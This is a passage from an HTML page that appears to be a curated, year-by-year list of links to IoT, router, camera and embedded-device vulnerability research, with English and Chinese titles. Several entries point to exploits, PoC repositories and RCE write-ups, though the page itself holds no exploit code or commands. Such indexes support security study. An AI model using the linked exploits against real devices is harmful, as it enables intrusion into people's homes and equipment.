Ruck Us Again - The Exploit Returns</a></li><li><a href="https://adepts.of0x.cc/ruckus-vriot-rce/">Remote Command Execution in Ruckus IoT Controller (CVE-2020-26878 & CVE-2020-26879)</a></li><li><a href="https://myakupa.github.io/write-up-damn-vulnerable-arm-router">[write Up] Damn Vulnerable Arm Router</a></li><li><a href="https://www.pentestpartners.com/security-blog/smart-male-chastity-lock-cock-up/">Smart male chastity lock cock-up</a></li><li><a href="https://www.guardicore.com/2020/10/wareztheremote-turning-remotes-into-listening-devices/">WarezTheRemote: Turning Remotes Into Listening Devices</a></li><li><a href="https://asset-group.github.io/disclosures/sweyntooth/">SweynTooth Cybersecurity Vulnerabilities May Affect Certain Medical Devices: FDA Safety Communication</a> <a href="https://asset-group.github.io/disclosures/sweyntooth/sweyntooth.pdf">White Paper</a></li><li><a href="https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-tech-notes/-/tree/master/firefox-android-2020">Abuse UPnP,Firefox for Android LAN-Based Intent Triggering</a></li><li><a href="https://raelize.com/posts/espressif-esp32-bypassing-encrypted-secure-boot-cve-2020-13629/">Espressif ESP32: Bypassing Encrypted Secure Boot (CVE-2020-13629)</a></li><li><a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/call-an-exorcist-my-robots-possessed/">Call an Exorcist! My Robot’s Possessed!</a></li><li><a href="https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/">Backdoors and other vulnerabilities in HiSilicon based hardware video encoders</a></li><li><a href="https://www.pentestpartners.com/security-blog/speed-2-the-poseidon-adventure-when-cruise-ships-attack-part-1/">Speed 2 – The Poseidon Adventure</a> <a href="https://www.pentestpartners.com/security-blog/speed-2-the-poseidon-adventure-when-cruise-ships-attack-part-2/">PART-2</a></li><li><a href="https://labs.ioactive.com/2020/09/no-buffers-harmed-rooting-sierra.html?spref=tw">No buffers harmed: Rooting Sierra Wireless AirLink devices through logic bugs</a></li><li><a href="https://www.pentestpartners.com/security-blog/360lock-smart-lock-review/">360lock Smart Lock Review</a></li><li><a href="https://www.criticalstart.com/critical-vulnerabilities-discovered-in-mofi-routers/">Critical Vulnerabilities Discovered in MoFi Routers</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r8300-upnpd-preauth-rce/">Netgear Nighthawk R8300 upnpd PreAuth RCE</a> <a href="https://paper.seebug.org/1311/">分析与复现</a></li><li><a href="https://research.checkpoint.com/2020/dont-be-silly-its-only-a-lightbulb/">Don’t be silly – it’s only a lightbulb</a></li><li><a href="https://faruktuygun.com/directorytraversal.html">Ruijie Networks Switch Version S29_RGOS 11.4(1)B12P11 eWeb Directory Traversal</a></li><li><a href="https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/">Multiple Vulnerabilities discovered in the D-link Firmware DIR-816L</a> <a href="https://www.4hou.com/posts/7Ozy">译文</a></li><li><a href="https://guillaumebour.fr/articles/security_testing_pacemaker_ecosystem/part_1_introduction_context_methodology/">Security testing of the pacemaker ecosystem Part 1</a> <a href="https://guillaumebour.fr/articles/">ALL</a> <a href="https://www.4hou.com/posts/RwrO">译文 Part1</a></li><li><a href="https://www.pentestpartners.com/security-blog/threat-modelling-and-iot-hubs/">INTERNET OF THINGS Threat modelling and IoT hubs</a></li><li><a href="https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68">Tenda AC15 AC1900 Vulnerabilities Discovered and Exploited</a></li><li><a href="https://www.karansaini.com/os-command-injection-v-sol/">ARBITRARY OS COMMAND INJECTION ON V-SOL HOME ROUTERS</a></li><li><a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/my-adventures-hacking-the-iparcelbox/?hilite='iParcelBox'">My Adventures Hacking the iParcelBox</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-smart-devices-to-convince-dementia-sufferers-to-overdose/">Hacking smart devices to convince dementia sufferers to overdose</a></li><li><a href="https://pierrekim.github.io/blog/2020-07-07-cdata-olt-0day-vulnerabilities.html">Multiple vulnerabilities found in CDATA OLTs</a></li><li><a href="https://www.pentestpartners.com/security-blog/pwning-smart-garage-door-openers/">Pwning smart garage door openers</a></li><li><a href="https://full-disclosure.eu/reports/2019/FDEU-CVE-2019-10222-telia-savitarna-backdoor.html">RCE on Telia Routers</a></li><li><a href="https://lp.firedome.io/hubfs/Yale%20WIPC-301W%20RCE%20Vulnerability%20Report%205-6.pdf">0-Day Vulnerabilities in Yale IP Cameras</a></li><li><a href="https://securityintelligence.com/posts/vulnerable-powerline-extenders-underline-lax-iot-security/">Multiple vulnerabilities in Tenda PA6 Wi-Fi Powerline extender</a></li><li><a href="https://www.zerodayinitiative.com/blog/2020/6/24/zdi-20-709-heap-overflow-in-the-netgear-nighthawk-r6700-router">ZDI-20-709: HEAP OVERFLOW IN THE NETGEAR NIGHTHAWK R6700 ROUTER</a> <a href="https://www.anquanke.com/post/id/209217">译文</a> <a href="https://www.anquanke.com/post/id/209232">分析</a> <a href="https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md">Github</a></li><li><a href="https://blog.grimm-co.com/2020/06/soho-device-exploitation.html">79 Netgear router models httpd Firmware Upload Stack-based Buffer Overflow Remote Code</a> <a href="https://github.com/grimm-co/NotQuite0DayFriday/tree/master/2020.06.15-netgear">POC</a></li><li><a href="https://www.jsof-tech.com/ripple20/">Ripple20: 19 Zero-Day Vulnerabilities Amplified by the Supply Chain</a> <a href="https://www.jsof-tech.com/wp-content/uploads/2020/06/JSOF_Ripple20_Technical_Whitepaper_June20.pdf">Whitepaper 1</a></li><li><a href="https://unit42.paloaltonetworks.com/6-new-d-link-vulnerabilities-found-on-home-routers/">6 New Vulnerabilities Found on D-Link Home Routers</a></li><li><a href="https://limitedresults.com/2020/06/nrf52-debug-resurrection-approtect-bypass/">nRF52 Debug Resurrection (APPROTECT Bypass)</a></li><li><a href="https://callstranger.com/">CVE-2020-12695: UPnP CallStranger</a></li><li><a href="https://douevenknow.us/post/619763074822520832/an-el1el3-coldboot-vulnerability">An EL1/EL3 coldboot vulnerability affecting 7 years of LG Android devices</a></li><li><a href="https://research.hisolutions.com/2020/04/open-the-gates-insecurity-of-cloudless-smart-door-systems/">Open the Gates! The (In)Security of Cloudless Smart Door Systems</a></li><li><a href="https://github.com/chengcheng227/CVE-POC">ASUS and Xiaomi smart home devices</a></li><li><a href="https://surfingattack.github.io/">SurfingAttack: 超声波与语音助手交互的隐秘攻击</a></li><li><a href="https://cablehaunt.com/">博通内核漏洞 Cable Haunt</a></li><li><a href="https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf">CVE-2019-15126:Kr00k Wi-Fi 加密缺陷</a></li><li><a href="https://research.nccgroup.com/2020/02/10/interfaces-d-to-rce/">Mozilla WebThings IoT gateway Interfaces.d to RCE</a></li><li><a href="https://habr.com/en/post/486856/">0day vulnerability (backdoor) in firmware for HiSilicon-based DVRs, NVRs and IP cameras</a></li><li><a href="http://www.simonweckert.com/googlemapshacks.html">Google Maps Hacks</a></li><li><a href="https://blog.checkpoint.com/2020/02/05/the-dark-side-of-smart-lighting-check-point-research-shows-how-business-and-home-networks-can-be-hacked-from-a-lightbulb/">How Business and Home Networks Can Be Hacked from a Lightbulb</a></li><li><a href="https://zhuanlan.zhihu.com/p/355484418">CNVD-2021-14536 锐捷 RG-UAC 统一上网行为管理审计系统信息泄露漏洞</a></li><li><a href="https://jfrog.com/blog/major-vulnerabilities-discovered-in-qualcomm-qcmap/?vr=1">Vulnerabilities Discovered in Qualcomm QCMAP enable remote root access</a></li><li><a href="https://xuanxuanblingbling.github.io/iot/2020/07/08/stm32/">SCTF 2020 Password Lock Plus 入门STM32逆向</a></li><li><a href="https://www.blackhillsinfosec.com/machine-in-the-middle-mitm-ble-attack/">Machine-in-the-Middle (MitM) BLE Attack</a></li></ul><h2 id="2019"><a href="#2019" class="headerlink" title="2019"></a>2019</h2><ul><li><a href="https://pulsesecurity.co.nz/articles/TPM-sniffing">Extracting BitLocker keys from a TPM</a></li><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201911/P020191115523217021278.pdf">物联网终端安全白皮书(2019)</a></li><li><a href="https://note.youdao.com/coshare/index.html?token=91D38BE5B19F41A3865D62A6D1D11D53&gid=101995961">智慧城市网络安全白皮书</a></li><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201912/P020191219401564573602.pdf">2019互联网设备-智能音箱安全白皮书</a></li><li><a href="https://mp.weixin.qq.com/s/suXWmn_PM6zmm3loYO1Zgw">启明星辰ADLab:智能音箱网络安全与隐私研究报告</a></li><li><a href="https://lightcommands.com/">激光入侵语音控制系统</a></li><li><a href="https://www.armis.com/bleedingbit/">BLEEDINGBIT:THE HIDDEN ATTACK SURFACE WITHIN BLE CHIPS</a></li><li><a href="https://paper.seebug.org/1039/">CVE-2019-1663 Cisco 的多个低端设备的堆栈缓冲区溢出漏洞分析</a></li><li><a href="https://github.com/oreosES/exploits/tree/master/CVE-2019-12272">CVE-2019-12272 OpenWrt图形化管理界面LuCI命令注入</a></li><li><a href="https://gsec.hitb.org/sg2019/sessions/4g-lte-man-in-the-middle-attacks-with-a-hacked-femtocell/">4G LTE Man in the Middle Attacks with a Hacked Femtocell</a> <a href="https://www.youtube.com/watch?v=EXNgKpCWbCM">Video</a> <a href="https://gsec.hitb.org/materials/sg2019/D2%20-%204G%20LTE%20Man%20in%20the%20Middle%20Attacks%20with%20a%20Hacked%20Femtocell%20-%20Xiaodong%20Zou.pdf">Silde</a></li><li><a href="https://airbus-seclab.github.io/ilo/INSOMNIHACK2019-Slides-Riding_the_lightning_iLO4_5_BMC_security_wrapup-perigaud-gazet-czarny.pdf">Riding the lightning: iLO4&5 BMC security wrap-up</a></li><li><a href="https://airbus-seclab.github.io/embedded_controller/BH2019-Slides-Breaking_Through_Another_Side_Bypassing_Firmware_Security_Boundaries_from_Embedded_Controller-matrosov-gazet.pdf">Breaking Through Another Side: Bypassing Firmware Security Boundaries from Embedded Controller</a></li><li><a href="https://medium.com/@s1kr10s/d-link-dir-859-rce-unautenticated-cve-2019-17621-en-d94b47a15104">D-Link DIR-859 —Unauthenticated RCE (CVE-2019–17621) UPnP Command Injection</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-royal-vault-password-keeper/">Hacking Hardware Password Managers: Royal Vault Password Keeper(COMS Flash)</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-passwordsfast/">Hacking Hardware Password Managers: passwordsFAST(I2C Flash)</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-hardware-password-managers-the-reczone/">Hacking Hardware Password Managers: The RecZone(SPI Flash)</a></li><li><a href="https://mjg59.dreamwidth.org/53968.html">Wifi deauthentication attacks and home security</a></li><li><a href="https://blog.rapid7.com/2019/12/11/iot-vuln-disclosure-childrens-gps-smart-watches-r7-2019-57/">Children’s GPS Smart Watches (R7-2019-57)</a></li><li><a href="https://puzzor.github.io/Linksys-Velop-Authentication-bypass">Linksys velop authentication bypass</a></li><li><a href="https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/report.md">小米系列路由器远程命令执行漏洞(CVE-2019-18370、CVE-2019-18371)</a></li><li><a href="https://alephsecurity.com/2019/07/01/xiaomi-zigbee-1/">Xiaomi Smart Plug (ZNCZ02LM)</a> <a href="https://alephsecurity.com/2019/07/09/xiaomi-zigbee-2/">Part 2:Beyond Architecture</a> <a href="https://alephsecurity.com/2019/07/15/xiaomi-zigbee-3/">Part 3:Live Debugging</a></li><li><a href="https://bbs.hassbian.com/thread-8903-1-1.html">绿板小爱同学升级启用root密码后的故事。。</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-zte-mobile-hotspot-ms910s-cve-2019-3422/">Multiple Vulnerabilities in ZTE mobile Hotspot MS910S(硬编码、nday)</a></li><li><a href="https://devco.re/blog/2019/11/11/HiNet-GPON-Modem-RCE/">中華電信數據機遠端代碼執行漏洞</a></li><li><a href="http://0x42424242.in/xiongmai/">Xiongmai Camera - Investigational Journey</a></li><li><a href="https://lightcommands.com/">Laser-Based Audio Injection on Voice-Controllable Systems</a></li><li><a href="https://hacked.camera/">Security cameras vulnerable to hijacking</a></li><li><a href="https://srlabs.de/bites/sim_attacks_demystified/">After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk</a></li><li><a href="https://www.pentestpartners.com/security-blog/cve-2019-12103-analysis-of-a-pre-auth-rce-on-the-tp-link-m7350-with-ghidra/">CVE-2019-12103 – Analysis of a Pre-Auth RCE on the TP-Link M7350</a></li><li><a href="https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/">Say Cheese: Ransomware-ing a DSLR Camera</a></li><li><a href="https://blog.rapid7.com/2019/08/01/r7-2019-18-multiple-hickory-smart-lock-vulnerabilities/">Multiple Hickory Smart Lock Vulnerabilities</a></li><li><a href="https://zh-cn.tenable.com/security/research/tra-2019-36?tns_redirect=true">大华部分产品VideoTalk音频下载功能未授权访问</a></li><li><a href="http://github.com/mame82/UnifyingVulnsDisclosureRepo">Logitech Unifying Vluns</a></li><li><a href="https://blackmarble.sh/zipato-smart-hub/">Breaking & Entering with Zipato SmartHubs</a></li><li><a href="https://www.pentestpartners.com/security-blog/ewon-flexy-iot-router-a-deep-dive/">Ewon Flexy IoT Router. A Deep dive</a></li><li><a href="https://securityintelligence.com/buffer-overflow-vulnerability-in-tp-link-routers-can-allow-remote-attackers-to-take-control/">Buffer Overflow Vulnerability in TP-Link Routers Can Allow Remote Attackers to Take Control</a></li><li><a href="https://research.checkpoint.com/we-decide-what-you-see-remote-code-execution-on-a-major-iptv-platform/">We Decide What You See: Remote Code Execution on a Major IPTV Platform</a></li><li><a href="https://securityintelligence.com/posts/critical-rce-vulnerability-in-tp-link-wi-fi-extenders-can-grant-attackers-remote-control/">CVE-2019-7406: Critical RCE Vulnerability in TP-Link Wi-Fi Extenders Can Grant Attackers Remote Control</a></li><li><a href="https://www.anquanke.com/post/id/175625">路由器漏洞挖掘之 DIR-805L 越权文件读取漏洞分析</a></li><li><a href="https://www.zerodayinitiative.com/blog/2019/6/6/mindshare-hardware-reversing-with-the-belkin-surf-n300-router">MINDSHARE: HARDWARE REVERSING WITH THE BELKIN SURF N300 ROUTER</a></li><li><a href="https://research.checkpoint.com/we-decide-what-you-see-remote-code-execution-on-a-major-iptv-platform/">乌克兰IPTV平台——Infomir的远程代码执行漏洞利用分析</a></li><li><a href="https://github.com/bnbdr/wd-rce/">WD My Cloud RCE</a></li><li><a href="https://ezequieltbh.me/posts/2019/05/love-is-in-the-air-reverse-engineering-a-shitty-drone/">Love is in the air: Reverse Engineering a shitty drone</a></li><li><a href="https://fidusinfosec.com/exploiting-10000-devices-used-by-britains-most-vulnerable/">EXPLOITING 10,000+ DEVICES USED BY BRITAIN’S MOST VULNERABLE</a></li><li><a href="https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170">Invading Your Personal Cloud — ISE Labs Exploits the Seagate stcr3000101</a></li><li><a href="https://badpackets.net/over-25000-linksys-smart-wi-fi-routers-vulnerable-to-sensitive-information-disclosure-flaw/">Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw</a></li><li><a href="https://www.tenable.com/security/research/tra-2019-20">OEM Presentation Platform Vulnerabilities</a></li><li><a href="https://ssd-disclosure.com/archives/2910">ZyXEL / Billion Multiple Vulnerabilities</a></li><li><a href="https://www.tenable.com/security/research/tra-2019-20">Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection</a></li><li><a href="https://blog.talosintelligence.com/2019/04/vulnerability-sierra-airlink.html">Multiple vulnerabilities in Sierra Wireless AirLink ES450</a></li><li><a href="https://github.com/tiagorlampert/CHAOS">CVE-2019-1652/CVE-2019-1653 Exploits For Cisco RV320</a></li><li><a href="https://twitter.com/mjg59/status/1111106885736787975">Arbitrary Command Execution On The TP-Link SR20 Smart Hub And Router</a></li><li><a href="https://github.com/scarvell/grandstream_exploits/">Grandstream 设备中的 RCE 漏洞 EXPLOIT 集合</a></li><li><a href="https://www.cymotive.com/wp-content/uploads/2019/03/Hell2CAP-0day.pdf">BlueSDK Hell2CAP 0day</a></li><li><a href="https://blackmarble.sh/zipato-smart-hub/">Breaking & Entering with Zipato SmartHubs</a></li><li><a href="https://www.fortinet.com/blog/threat-research/d-link-routers-found-vulnerable-rce">Multiple D-Link Routers Found Vulnerable To Unauthenticated Remote Code Execution(命令注入)</a></li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0749">Sierra Wireless AirLink ES450 ACEManager upload.cgi Unverified Password Change Vulnerabilit</a></li><li><a href="https://0x41.cf/reversing/2019/10/08/unlocking-nokia-g240wa.html">Unlocking IAM’s Nokia G-240W-A router (Part 1) </a></li><li><a href="https://eclypsium.com/2019/09/03/usbanywhere-bmc-vulnerability-opens-servers-to-remote-attack/">USBAnywhere:Virtual Media Vulnerability in BMC Opens Servers to Remote Attack</a></li><li><a href="https://securelist.com/hacking-microcontroller-firmware-through-a-usb/89919/">Hacking microcontroller firmware through a USB</a></li><li><a href="https://www.cnblogs.com/yangmzh3/p/11214451.html">VxWorks固件分析方法总结</a></li><li><a href="https://www.cnblogs.com/yangmzh3/p/11231423.html">NOE77101固件后门漏洞分析</a></li></ul><h2 id="2018"><a href="#2018" class="headerlink" title="2018"></a>2018</h2><ul><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201809/P020180919390470911802.pdf">《物联网安全白皮书(2018)》</a></li><li><a href="https://research.nccgroup.com/2020/12/18/domestic-iot-nightmares-smart-doorbells/">Domestic IoT Nightmares: Smart Doorbells()</a></li><li><a href="https://github.com/tencentbladeteam/Exploit-Amazon-Echo">[DEF CON 26] Breaking Smart Speaker - Exploit Amazon Echo</a> <a href="http://m.elecfans.com/article/729418.html">如何黑入亚马逊Echo音箱——窃听、录音</a></li><li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2018-0512">CVE-2018-3833: Insteon Hub PubNub Firmware Downgrade Vulnerability</a></li><li><a href="https://github.com/airbus-seclab/ilo4_toolbox">Toolbox for HPE iLO4 & iLO5 analysis</a></li><li><a href="https://airbus-seclab.github.io/ilo/ZERONIGHTS2018-Slides-EN-Turning_your_BMC_into_a_revolving_door-perigaud-gazet-czarny.pdf">Slide: Turning your BMC into a revolving door</a></li><li><a href="https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf">Backdooring your server through its BMC</a> <a href="https://airbus-seclab.github.io/ilo/SSTIC2018-Article-subverting_your_server_through_its_bmc_the_hpe_ilo4_case-gazet_perigaud_czarny.pdf">Slide</a></li><li><a href="https://airbus-seclab.github.io/ilo/RECONBRX2018-Slides-Subverting_your_server_through_its_BMC_the_HPE_iLO4_case-perigaud-gazet-czarny.pdf">Slide: Subverting your server through its BMC</a></li><li><a href="https://airbus-seclab.github.io/embedded_controller/BH2019-Slides-Breaking_Through_Another_Side_Bypassing_Firmware_Security_Boundaries_from_Embedded_Controller-matrosov-gazet.pdf">Breaking Through Another Side: Bypassing Firmware Security Boundaries from Embedded Controller</a></li><li><a href="https://research.checkpoint.com/2018/sending-fax-back-to-the-dark-ages/">Faxploit: Sending Fax Back to the Dark Age</a></li><li><a href="https://blog.talosintelligence.com/2019/01/vulnerability-deep-dive-tp-link.html">TP-Link TL-R600 VPN remote code execution vulnerabilities</a></li><li><a href="https://github.com/iceMatcha/Some-Vulnerabilities-of-D-link-Dir815/blob/master/Vulnerabilities_Summary.md">CVE-2018-10106: D-Link DIR-815 permission bypass and information disclosure</a> <a href="https://ray-cp.github.io/archivers/d-link-getcfg_php-info-leak">分析</a></li><li><a href="https://www.schneider-electric.com/en/download/document/SEVD-2018-354-01/">Security Notification – EVLink Parking</a></li><li><a href="https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/">Guardzilla IoT Video Camera Hard-Coded Credentials (CVE-2018-5560)</a></li><li><a href="https://blog.securityevaluators.com/terramaster-nas-vulnerabilities-discovered-and-exploited-b8e5243e7a63">TerraMaster NAS Vulnerabilities Discovered and Exploited</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/">TerraMaster OS exportUser.php Remote Code Execution</a></li><li><a href="https://blog.talosintelligence.com/2018/07/sony-ipela-vulnerability-spotlight-multiple.html">Multiple Vulnerabilities in Sony IPELA E Series Camera</a></li><li><a href="https://blog.talosintelligence.com/2018/07/samsung-smartthings-vulns.html?m=1">Multiple Vulnerabilities in Samsung SmartThings Hub</a></li><li><a href="https://www.pentestpartners.com/security-blog/hacking-swann-home-security-camera-video/">Hacking Swann & FLIR/Lorex home security camera video</a></li><li><a href="https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/">VDOO Discovers Significant Vulnerabilities in Axis Cameras</a></li><li><a href="https://blog.vdoo.com/2018/06/06/vdoo-has-found-major-vulnerabilities-in-foscam-cameras/">Major Vulnerabilities in Foscam Cameras</a></li><li><a href="https://github.com/yough3rt/IOT-pwn-for-fun/">CVE-2018-11481:多款TP-LINK产品远程代码执行安全漏洞</a></li><li><a href="https://embedi.com/blog/whos-watching-the-watchers-vol-ii-norton-core-secure-wifi-router/">Who’s Watching the Watchers (Vol. II): Norton Core Secure WiFi Router</a></li><li><a href="https://www.coresecurity.com/advisories/quest-dr-series-disk-backup-multiple-vulnerabilities">Quest DR Series Disk Backup Multiple Vulnerabilities</a></li><li><a href="https://www.indigofuzz.com/article.php?docid=talktalk1430">TalkTalk Router - WPS Exploit</a></li><li><a href="https://securelist.com/backdoors-in-d-links-backyard/85530/">Backdoors in D-Link’s backyard (Multiple vulnerabilities in D-Link DIR-620 router)</a></li><li><a href="https://www.draytek.co.uk/support/security-advisories/kb-advisory-csrf-and-dns-dhcp-web-attacks">DrayTek Routers: CSRF & DNS Changed Web Interface Attacks</a></li><li><a href="https://github.com/ezelf/CVE-2018-9995_dvr_credentials">CVE-2018-9995: Get DVR Credentials</a></li><li><a href="https://www.fireeye.com/blog/threat-research/2018/05/rooting-logitech-harmony-hub-improving-iot-security.html">Rooting a Logitech Harmony Hub: Improving Security in Today’s IoT World</a></li><li><a href="https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/">Critical Vulnerability Found in Majority of LG NAS Devices</a> <a href="https://www.cesafe.com/html/3962.html">译文</a></li><li><a href="https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/">Critical RCE Vulnerability Found in Over a Million GPON Home Routers</a></li><li><a href="https://www.bleepingcomputer.com/news/security/5-000-routers-with-no-telnet-password-nothing-to-see-here-move-along/">巴西5000台路由器默认未设置Telnet密码,可被轻易劫持</a></li><li><a href="https://www.exploit-db.com/exploits/40500/">AVTECH IP Camera/NVR/DVR Devices - Multiple Vulnerabilities</a></li><li><a href="https://www.tenable.com/blog/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness">AXIS Camera App Malicious Package Distribution Weakness</a> <a href="https://github.com/rapid7/metasploit-framework/pull/16190">EXP</a></li><li><a href="https://research.checkpoint.com/2018/dji-drone-vulnerability/">DJI Drone Vulnerability</a></li><li><a href="https://paper.seebug.org/430/">Android蓝牙远程命令执行漏洞利用实践:从PoC到Exploit</a></li><li><a href="https://bbs.kanxue.com/thread-254358.htm">移动基带安全研究系列之一 概念和系统篇</a></li><li><a href="https://www.anquanke.com/post/id/149698">PWN2OWN shannon基带破解之旅</a> <a href="https://github.com/comsecuris/shannonRE">Github</a></li><li><a href="https://www.anquanke.com/post/id/149698">PWN2OWN shannon基带破解之旅</a></li></ul><h2 id="2017"><a href="#2017" class="headerlink" title="2017"></a>2017</h2><ul><li><a href="https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html">Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 1)</a></li><li><a href="https://www.exploit-db.com/docs/english/44003-hisilicon-dvr-hack.pdf">HiSilicon DVR hack</a></li><li><a href="https://conference.hitb.org/hitbsecconf2017ams/sessions/femtocell-hacking-from-zero-to-zero-day/#">Femtocell Hacking: From Zero to Zero Day</a> <a href="http://conference.hitb.org/hitbsecconf2017ams/materials/D1T2%20-%20JeongHoon%20Shin%20-%20Femotcell%20Hacking.pdf">Silde</a></li><li><a href="https://www.bastille.net/research/vulnerabilities/cabletap/cabletap-affected-devices">CableTap: a wide array of critical vulnerabilities in ISP-provided, RDK-based wireless gateways and set-top boxes</a> <a href="https://raw.githubusercontent.com/BastilleResearch/CableTap/master/doc/pdf/DEFCON-25-Marc-Newlin-CableTap-White-Paper.pdf">White Paper</a></li><li><a href="https://paper.seebug.org/488/">GoAhead远程代码执行漏洞(CVE-2017-17562)分析及实战</a></li><li><a href="http://blog.asiantuntijakaveri.fi/2017/03/backdoor-and-root-shell-on-zte-mf286.html">Backdoor and root shell on ZTE MF286</a></li></ul><h2 id="2016"><a href="#2016" class="headerlink" title="2016"></a>2016</h2><ul><li><a href="https://github.com/jacob-baines/veralite_upnp_exploit_poc">Veralite UPnP Exploit</a></li><li><a href="http://colinoflynn.com/2016/07/getting-root-on-philips-hue-bridge-2-0/">Getting Root on Philips Hue Bridge 2.0</a> <a href="http://colinoflynn.com/wp-content/uploads/2016/08/Towards-a-Lightbulb-Worm-Combined.pdf">Silde1</a> <a href="http://colinoflynn.com/wp-content/uploads/2016/08/us-16-OFlynn-A-Lightbulb-Worm-wp.pdf">Silde2</a></li><li><a href="https://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities">TP-LINK TDDP Multiple Vulnerabilities</a></li></ul><h2 id="安全研究"><a href="#安全研究" class="headerlink" title="安全研究"></a>安全研究</h2><ul><li><a href="https://www.kawabangga.com/posts/4935">针对进程设置路由规则</a></li><li><a href="https://blog.spacehuhn.com/digispark-vid-pid">Change USB VID & PID on Digispark</a></li><li><a href="https://networklogician.com/2021/04/17/sniffing-ssh-passwords/">Sniffing SSH Passwords</a></li><li><a href="https://lude.rs/h4ck1ng/rootless_sniffing.html">Rootless Sniffing: Unix Domain Socket MITM</a></li><li><a href="https://jamchamb.net/2022/01/02/modify-vmlinuz-arm.html">Modifying Embedded Filesystems in ARM Linux zImages</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/07/nand-dump-repair/">Repairing a Broken Huawei NAND Dump and Single-Bit Errors</a></li><li><a href="https://01001000.xyz/2021-04-21-Hiding-a-Trojan-in-an-AVR-Arduino-Bootloader/">FLAW3D: Hiding a Trojan in an AVR Arduino Bootloader</a></li><li><a href="https://gorgias.me/2019/12/27/固件提取系列-UBI文件系统提取以及重打包/">固件提取系列-UBI文件系统提取以及重打包</a></li><li><a href="https://plantegg.github.io/2018/01/01/通过tcpdump对Unix Socket 进行抓包解析/">通过tcpdump对Unix Domain Socket 进行抓包解析</a></li><li><a href="https://www.anquanke.com/post/id/269885">NFC竟也存在高危漏洞,看他如何分析</a></li><li><a href="https://bbs.pediy.com/thread-271543.htm">BLECTF 低功耗蓝牙CTF挑战</a></li><li><a href="https://0x434b.dev/overview-of-glibc-heap-exploitation-techniques/">Overview of GLIBC heap exploitation techniques</a></li><li><a href="https://0x434b.dev/misc-study-notes-about-arm-aarch64-assembly-and-the-arm-trusted-execution-environment-tee/">MISC study notes about ARM AArch64 Assembly and the ARM Trusted Execution Environment (TEE)</a></li><li><a href="https://secnigma.wordpress.com/2022/01/18/a-beginners-guide-into-router-hacking-and-firmware-emulation/">A Beginner’s guide into Router Hacking and Firmware Emulation</a></li><li><a href="https://blog.3or.de/starting-embedded-reverse-engineering-freertos-libopencm3-on-stm32f103c8t6.html">Starting Embedded Reverse Engineering: FreeRTOS, libopencm3 on STM32F103C8T6</a></li><li><a href="https://lupyuen.github.io/articles/wifi">Reverse Engineering WiFi on RISC-V BL602</a></li><li><a href="https://www.devalias.net/devalias/2018/05/13/usb-reverse-engineering-down-the-rabbit-hole/">USB Reverse Engineering: Down the rabbit hole</a></li><li><a href="https://blog.3or.de/arm-exploitation-return-oriented-programming.html">ARM Exploitation: Return oriented Programming</a></li><li><a href="https://cwe.mitre.org/scoring/lists/2021_CWE_MIHW.html">CWE Most Important Hardware Weaknesses</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/09/introducing-flash-bash/">Introducing Flash BASH(uboot Glitching)</a></li><li><a href="https://carvesystems.com/news/pin2pwn-how-to-root-an-embedded-linux-box-with-a-sewing-needle/">pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle</a></li><li><a href="https://eprint.iacr.org/2006/054.pdf">How to Build a Low-Cost, Extended-Range RFID Skimmer</a></li><li><a href="https://www.eetimes.com/anti-tamper-real-time-clock-rtc-make-your-embedded-system-secure/">Anti tamper real time clock (RTC) - make your embedded system secure</a></li></ul><h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><ul><li><a href="https://redballoonsecurity.com/flash-dump/">Flash Dump Made Easy With OFRAK</a></li><li><a href="https://github.com/nccgroup/sniffle">nccgroup/Sniffle: A sniffer for Bluetooth 5 and 4.x LE</a></li><li><a href="https://blog.quarkslab.com/binbloom-blooms-introducing-v2.html">Binbloom blooms: a tool to find the base address of any 32 and 64-bit architecture firmware</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/09/introducing-flash-bash/">Introducing Flash BASH</a></li></ul><h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><ul><li><a 